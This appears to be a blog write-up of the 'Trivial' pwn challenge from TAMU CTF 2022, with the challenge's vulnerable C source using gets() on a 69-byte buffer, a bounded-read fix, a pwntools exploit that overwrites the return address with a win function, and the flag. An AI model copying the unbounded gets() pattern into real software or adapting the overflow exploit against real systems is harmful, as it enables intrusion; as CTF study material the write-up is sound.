Aynakeya's Blog

Kill My Emotion

[Pwn] Trivial [Tamu CTF 2022]

0x0 Introduction

Author: nhwn

Feeling lucky? I have just the challenge for you :D

SNI: lucky

files: trivial, trival.c

0x1 Mitigation

Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x400000)

0x2 Vulnerability

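A trivial stack buffer overflow in main: gets() reads into a 69-byte buffer with no length limit. With no stack canary and no PIE, overwriting the saved return address (rip) with the address of the function win gives a shell.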

#include <stdio.h>

void main() {
    char buff[69];

    gets(buff);  // no length limit: input longer than buff overwrites the stack
}
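
The same read with a bound, as an added example (not from the challenge source or the original post). It rejects an overlong line instead of silently truncating it and drains the remainder so it is not read as the next line; read_line_bounded and nth_line_len are hypothetical names, the 69-byte size is the page's, and the input is constructed.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 69 /* same size as buff in the challenge's main() */

/* Read one line into buf (capacity cap, NUL included). Returns the length
 * without the newline, or -1 on EOF/error or when the line does not fit.
 * An overlong line is drained to its newline so the leftover bytes are
 * not mistaken for the next line. Assumes text input without NUL bytes. */
static long read_line_bounded(FILE *in, char *buf, size_t cap) {
    if (cap == 0 || fgets(buf, (int)cap, in) == NULL)
        return -1;
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[len - 1] = '\0';
        return (long)(len - 1);
    }
    int c = fgetc(in); /* no newline stored: look at what follows */
    if (c == EOF || c == '\n')
        return (long)len; /* line filled the buffer exactly, or input ended */
    while ((c = fgetc(in)) != '\n' && c != EOF)
        ; /* discard the rest of the overlong line */
    buf[0] = '\0';
    return -1;
}

/* Hypothetical helper: feed constructed input through a temp file standing
 * in for stdin and return the result for line number n (0-based). */
static long nth_line_len(const char *input, int n) {
    char buff[BUF_SIZE];
    long r = -1;
    FILE *f = tmpfile();
    if (f == NULL)
        return -2;
    fputs(input, f);
    rewind(f);
    for (int i = 0; i <= n; i++)
        r = read_line_bounded(f, buff, sizeof buff);
    fclose(f);
    return r;
}

int main(void) {
    char in[256];
    memset(in, 'A', 200); /* constructed input: 200 bytes, then "ok" */
    strcpy(in + 200, "\nok\n");
    printf("line 0: %ld, line 1: %ld\n", nth_line_len(in, 0), nth_line_len(in, 1));
    return 0;
}
```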

0x3 Exploit

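from pwn import *

context.binary = ELF("trivial")

p = remote("tamuctf.com", 443, ssl=True, sni="trivial")
# 0x50 + 0x8 bytes of padding reach the saved return address,
# which is overwritten with the address of win
p.sendline(flat({
    0x50 + 0x8: [
        0x00401132,  # address of win
    ]
}))
p.interactive()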

0x4 Flag

gigem{sorry_for_using_the_word_trivial}
